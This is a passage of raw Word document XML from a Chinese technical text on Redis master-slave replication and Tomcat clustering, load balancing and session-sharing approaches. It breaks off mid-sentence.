          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当从数据库重新连上主数据库之后，主数据库只需要将断线期间的命令传送给从数据库，从而提高复制的实用性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7C57" w:rsidRPr="007A7C57" w:rsidRDefault="007A7C57" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动并连接到</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，它将主动发送一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYNC</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。此后</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将启动后台存盘进程，同时收集所有接收到的用于修改数据集的命令，在后台进程执行完毕后，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将传送整个数据库文件到</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以完成一次完全同步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>复制初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。而</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器在接收到数据库文件数据之后将其存盘并加载到内存中。此后，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续将所有已经收集到的修改命令，和新的修改命令依次传送给</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slaves</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将在本次执行这些数据修改命令，从而达到最终的数据同步</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>复制同步阶段</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7C57" w:rsidRDefault="007A7C57" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的链接出现断连现象，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以自动重连</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是在连接成功之后，一次完全同步将被自动执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2676508"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28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4" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2676508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1289340"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1289340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694484" w:rsidRDefault="00694484" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="952685"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28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46" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="952685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00237AB2" w:rsidRDefault="00237AB2" w:rsidP="00237AB2">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集群</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00237AB2" w:rsidRDefault="00237AB2" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237AB2" w:rsidRDefault="00237AB2" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00237AB2" w:rsidRDefault="00237AB2" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:ind w:firstLine="435"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A959CB" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="007A7C57">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A959CB" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">.8 </w:t>
      </w:r>
      <w:r w:rsidR="008E0342" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A959CB" w:rsidRPr="00F41A4C">
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00CD64C8" w:rsidRPr="00F41A4C">
        <w:t>分布式集群与负载均衡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D432DF" w:rsidRDefault="00D432DF" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>为什么需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>集群：并发量、单点故障。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>应用服务器的集群，通常是分为两个部分，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>访问负载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，一个就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>复制或同步</w:t>
      </w:r>
      <w:r w:rsidR="00566676" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00C64AD4" w:rsidP="00C64AD4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.8.1</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>共享方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>专门放在一台服务器上，集群中所有机器都通过这台</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">B. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>所有机器进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00222B1D" w:rsidP="00222B1D">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.8</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>广播技术的集群</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Simple Tcp Cluster)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集群机器间建立</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>连接完成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的拷贝。拷贝分同步拷贝和异步模式：同步拷贝模式下，客户端的响应必须要等</w:t>
      </w:r>
